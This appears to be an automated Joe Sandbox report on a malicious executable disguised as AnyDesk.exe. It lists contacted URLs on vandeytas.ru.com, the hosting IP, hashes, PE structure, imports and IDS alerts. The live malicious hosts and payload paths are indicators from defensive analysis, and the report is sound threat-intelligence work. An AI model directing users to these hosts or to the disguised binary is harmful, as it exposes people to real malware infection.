      https://vandeytas.ru.com/233_HlvzmhuinffL0%Avira URL Cloudsafe
      https://vandeytas.ru.com/l0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_HlvzmhuinffX0%Avira URL Cloudsafe
      https://vandeytas.ru.com/D0%Avira URL Cloudsafe
      https://vandeytas.ru.com:443/233_Hlvzmhuinff0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_Hlvzmhuinff00%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_Hlv0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_HlvzmhuinffLL0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_HlvzmhuinffT0%Avira URL Cloudsafe
      https://vandeytas.ru.com/0%Avira URL Cloudsafe
      https://vandeytas.ru.com/233_Hlvzmhuinffi0%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      vandeytas.ru.com
      50.7.187.218
      truetrueunknown
      NameMaliciousAntivirus DetectionReputation
      https://vandeytas.ru.com/233_Hlvzmhuinfftrue
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://vandeytas.ru.com/233_HlvzmhuinffgAnyDesk.exe, 00000000.00000003.2734850198.0000000000642000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3366823048.000000000063C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2474569149.000000000063E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2668808919.0000000000642000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://vandeytas.ru.com/233_HlvzmhuinffiAnyDesk.exe, 00000000.00000003.2734850198.0000000000649000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2188445742.000000000063C000.00000004.00000020.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://vandeytas.ru.com/233_HlvzmhuinffLAnyDesk.exe, 00000000.00000002.3382847342.00000000214E0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2495985049.0000000000642000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://vandeytas.ru.com/lAnyDesk.exe, 00000000.00000003.2734850198.0000000000642000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://vandeytas.ru.com/233_HlvzmhuinffXAnyDesk.exe, 00000000.00000003.2344442230.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3366823048.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3366823048.000000000058E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2474569149.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://vandeytas.ru.com/DAnyDesk.exe, 00000000.00000003.2343804811.0000000000644000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://vandeytas.ru.com/dAnyDesk.exe, 00000000.00000003.2734850198.0000000000642000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        https://vandeytas.ru.com:443/233_HlvzmhuinffAnyDesk.exe, 00000000.00000002.3366823048.000000000058E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2734850198.0000000000653000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.pmail.comAnyDesk.exe, AnyDesk.exe, 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3383259657.000000007F9FF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3368038850.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2120469469.0000000002872000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          https://vandeytas.ru.com/233_Hlvzmhuinff0AnyDesk.exe, 00000000.00000002.3366823048.000000000058E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://vandeytas.ru.com/233_HlvAnyDesk.exe, 00000000.00000002.3382171324.000000002090D000.00000004.00001000.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          https://vandeytas.ru.com/233_HlvzmhuinffLLAnyDesk.exe, 00000000.00000002.3382847342.00000000214E0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://vandeytas.ru.com/233_HlvzmhuinffTAnyDesk.exe, 00000000.00000002.3382847342.00000000214E0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3366823048.00000000005D5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://vandeytas.ru.com/AnyDesk.exe, 00000000.00000002.3366823048.000000000063C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2517737691.0000000000644000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2474569149.000000000063E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2668808919.0000000000642000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2256562401.0000000000644000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2343804811.0000000000644000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2188445742.0000000000646000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          50.7.187.218
          vandeytas.ru.comUnited States
          174COGENT-174UStrue
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1562860
          Start date and time:2024-11-26 08:10:11 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 5m 17s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:5
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:AnyDesk.exe
          Detection:MAL
          Classification:mal76.troj.evad.winEXE@1/0@2/1
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 99%
          • Number of executed functions: 22
          • Number of non-executed functions: 40
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Report size getting too big, too many NtDeviceIoControlFile calls found.
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          TimeTypeDescription
          02:11:04API Interceptor57x Sleep call for process: AnyDesk.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          50.7.187.218orig.eml.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
          • frsdragoz.za.com/OcrwNAZDnF56.bin
          orig.eml.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
          • frsdragoz.za.com/rXdAJWw196.bin
          3LxMjr9QIE.exeGet hashmaliciousGuLoaderBrowse
          • nughtofknifes.sa.com/EXuKqCxfBTYzW21.bin
          uzFrAkagaX.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
          • fwegwr.mypi.co/VkWGOQHXLDVTaJQLdaFnQRmo158.bin
          SARAY_RECEIPT.exeGet hashmaliciousFormBook, GuLoaderBrowse
          • fwegwr.mypi.co/gzkFUeaICJGODOkRr58.bin
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          COGENT-174USfbot.sh4.elfGet hashmaliciousMirai, MoobotBrowse
          • 38.57.189.73
          fbot.x86.elfGet hashmaliciousMirai, MoobotBrowse
          • 38.10.97.97
          fbot.arm7.elfGet hashmaliciousMirai, MoobotBrowse
          • 154.42.81.20
          fbot.mips.elfGet hashmaliciousMirai, MoobotBrowse
          • 38.89.2.58
          ZwmyzMxFKL.exeGet hashmaliciousBlackMoonBrowse
          • 206.238.43.118
          ZwmyzMxFKL.exeGet hashmaliciousBlackMoonBrowse
          • 206.238.43.118
          Payment-251124.exeGet hashmaliciousFormBookBrowse
          • 38.181.21.178
          la.bot.sh4.elfGet hashmaliciousUnknownBrowse
          • 154.49.45.52
          la.bot.arm5.elfGet hashmaliciousUnknownBrowse
          • 38.166.98.107
          la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
          • 38.214.239.244
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousUnknownBrowse
          • 50.7.187.218
          file.exeGet hashmaliciousUnknownBrowse
          • 50.7.187.218
          file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
          • 50.7.187.218
          file.exeGet hashmaliciousLummaC StealerBrowse
          • 50.7.187.218
          file.exeGet hashmaliciousLummaC StealerBrowse
          • 50.7.187.218
          file.exeGet hashmaliciousUnknownBrowse
          • 50.7.187.218
          file.exeGet hashmaliciousUnknownBrowse
          • 50.7.187.218
          file.exeGet hashmaliciousUnknownBrowse
          • 50.7.187.218
          file.exeGet hashmaliciousUnknownBrowse
          • 50.7.187.218
          file.exeGet hashmaliciousLummaC StealerBrowse
          • 50.7.187.218
          No context
          No created / dropped files found
          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):7.222011374672291
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.81%
          • Windows Screen Saver (13104/52) 0.13%
          • Win16/32 Executable Delphi generic (2074/23) 0.02%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          File name:AnyDesk.exe
          File size:1'299'968 bytes
          MD5:bceea9753420a675af68cda43864438e
          SHA1:0823f156da4f106a26b5738cf9f732d5dd68cdd8
          SHA256:b6a6a59c8b8387233be03bb2111830d4e8aafec6a62a290090ae75cbff5736ec
          SHA512:8dcd35be032e853bc785615e63993deb71fa2ef35a20db9427c2a281f20ea4768b3754b4887d212cc5867ee36e470d47e33a7333cc9ca0a22196ff8371e51490
          SSDEEP:24576:Ien4s+Jv82wO5m5jAyTgz1Camim9U/ZxvneUy6/1D+TzxF1Yb:IG+cc5z1CadUUXtSTr
          TLSH:1F55BF3271A5A4B6E92B32728C1F538F45DD2530DE332C221FE56EDC5F623522B2A176
          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
          Icon Hash:474726342a2a1343
          Entrypoint:0x45d7ac
          Entrypoint Section:.itext
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          DLL Characteristics:
          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:81dac283d2666612d5243f1d723c74b3
          Instruction
          push ebp
          mov ebp, esp
          add esp, FFFFFFF0h
          mov eax, 0045C168h
          call 00007F77FC849275h
          mov eax, dword ptr [0052ED44h]
          mov eax, dword ptr [eax]
          call 00007F77FC8966B1h
          mov ecx, dword ptr [0052EE40h]
          mov eax, dword ptr [0052ED44h]
          mov eax, dword ptr [eax]
          mov edx, dword ptr [0045BE7Ch]
          call 00007F77FC8966B1h
          mov eax, dword ptr [0052ED44h]
          mov eax, dword ptr [eax]
          call 00007F77FC896725h
          call 00007F77FC847018h
          lea eax, dword ptr [eax+00h]
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x1330000x255e.idata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x13f0000x7800.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1380000x64d0.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x1370000x18.rdata
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x1337100x5d0.idata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x5b3e80x5b40011d9a1ad82710b004f88fefb1b43a473False0.5216502568493151data6.532039173610071IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .itext0x5d0000x7f40x8004e6a486d38524f379d654a5032b1c97aFalse0.6318359375data6.267300121979772IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .data0x5e0000xd0ee40xd1000b121f2834ba7999d63d8841de9b19a62False0.5787429444527512data7.107869043221469IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .bss0x12f0000x36a00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .idata0x1330000x255e0x2600de36ad3e8b271db87f50a25f77b8b7d6False0.31918174342105265data5.027445121625309IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .tls0x1360000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rdata0x1370000x180x200892eeb2b39c521d2beff0d03ca1c4936False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x1380000x64d00x660087cbef9ec6754ef0e319a8f09d25222cFalse0.6569010416666666data6.691214029436303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
          .rsrc0x13f0000x78000x7800e43dbb8658adbe16c2c791d590ba9f92False0.27972005208333334data4.972863110900973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_CURSOR0x13fa880x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
          RT_CURSOR0x13fbbc0x134dataEnglishUnited States0.4642857142857143
          RT_CURSOR0x13fcf00x134dataEnglishUnited States0.4805194805194805
          RT_CURSOR0x13fe240x134dataEnglishUnited States0.38311688311688313
          RT_CURSOR0x13ff580x134dataEnglishUnited States0.36038961038961037
          RT_CURSOR0x14008c0x134dataEnglishUnited States0.4090909090909091
          RT_CURSOR0x1401c00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
          RT_BITMAP0x1402f40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
          RT_BITMAP0x1404c40x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
          RT_BITMAP0x1406a80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
          RT_BITMAP0x1408780x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
          RT_BITMAP0x140a480x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
          RT_BITMAP0x140c180x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
          RT_BITMAP0x140de80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
          RT_BITMAP0x140fb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
          RT_BITMAP0x1411880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
          RT_BITMAP0x1413580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
          RT_BITMAP0x1415280xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
          RT_ICON0x1416100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 4999 x 4999 px/m0.20560165975103734
          RT_DIALOG0x143bb80x52data0.7682926829268293
          RT_DIALOG0x143c0c0x52data0.7560975609756098
          RT_STRING0x143c600x170data0.4945652173913043
          RT_STRING0x143dd00x2b4data0.476878612716763
          RT_STRING0x1440840xb4data0.6888888888888889
          RT_STRING0x1441380xe8data0.6422413793103449
          RT_STRING0x1442200x2a8data0.4764705882352941
          RT_STRING0x1444c80x3e8data0.382
          RT_STRING0x1448b00x370data0.4022727272727273
          RT_STRING0x144c200x3ccdata0.33539094650205764
          RT_STRING0x144fec0x214data0.49624060150375937
          RT_STRING0x1452000xccdata0.6274509803921569
          RT_STRING0x1452cc0x194data0.5643564356435643
          RT_STRING0x1454600x3c4data0.3288381742738589
          RT_STRING0x1458240x338data0.42961165048543687
          RT_STRING0x145b5c0x294data0.42424242424242425
          RT_RCDATA0x145df00x10data1.5
          RT_RCDATA0x145e000x360data0.6724537037037037
          RT_RCDATA0x1461600x44cDelphi compiled form 'TForm1'0.5054545454545455
          RT_GROUP_CURSOR0x1465ac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
          RT_GROUP_CURSOR0x1465c00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
          RT_GROUP_CURSOR0x1465d40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
          RT_GROUP_CURSOR0x1465e80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
          RT_GROUP_CURSOR0x1465fc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
          RT_GROUP_CURSOR0x1466100x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
          RT_GROUP_CURSOR0x1466240x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
          RT_GROUP_ICON0x1466380x14data1.25
          DLLImport
          oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
          user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
          kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
          kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
          user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, IsCharUpperW, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
          gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
          version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
          kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
          oleaut32.dllGetErrorInfo, SysFreeString
          ole32.dllCoUninitialize, CoInitialize
          kernel32.dllSleep
          oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
          comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States
          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
          2024-11-26T08:11:09.360851+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64970850.7.187.218443TCP
          2024-11-26T08:11:11.638736+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64971150.7.187.218443TCP
          2024-11-26T08:11:13.914572+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64971350.7.187.218443TCP
          2024-11-26T08:11:16.082568+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64971550.7.187.218443TCP
          2024-11-26T08:11:18.223134+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64971850.7.187.218443TCP
          2024-11-26T08:11:20.675162+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64972550.7.187.218443TCP
          2024-11-26T08:11:22.868570+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64973350.7.187.218443TCP
          2024-11-26T08:11:25.014735+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64974250.7.187.218443TCP
          2024-11-26T08:11:27.172305+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64974950.7.187.218443TCP
          2024-11-26T08:11:29.389804+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64975650.7.187.218443TCP
          2024-11-26T08:11:31.526426+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64976350.7.187.218443TCP
